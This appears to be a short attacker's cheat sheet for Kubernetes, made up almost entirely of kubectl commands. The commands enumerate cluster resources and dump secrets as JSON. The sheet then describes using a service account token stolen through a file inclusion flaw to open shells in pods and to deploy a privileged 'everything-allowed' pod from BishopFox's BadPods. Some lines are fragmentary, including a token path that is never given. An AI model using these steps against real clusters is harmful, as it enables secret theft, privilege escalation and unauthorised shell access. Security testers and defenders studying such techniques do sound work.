- Get pods,
for all namespaces
kubectl auth can-i --list
kubectl get secrets
kubectl get nodes
kubectl get deployments
kubectl get services
kubectl get ingress
kubectl get jobs
- Intel about a secret, and output
kubectl describe secrets <secret>
kubectl get secret <secret> -o json
kubectl describe secrets <secret> -o 'json'
Abuse Token
- Inside a pod the service token(jwt) can be found under
- By change of an LFI extract the token and
kubectl auth can-i --list --token=$TOKEN
kubectl get pods --token=$TOKEN
kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
Create Pods
- Use BishopFox's BadPods
- If there is no internet connection add
imagePullPolicy: IfNotPresent
to the YAML file
kubectl apply -f pod.yml --token=$TOKEN
kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
Start Pods
kubectl exec -it <podname> -n <namespace> -- /bin/bash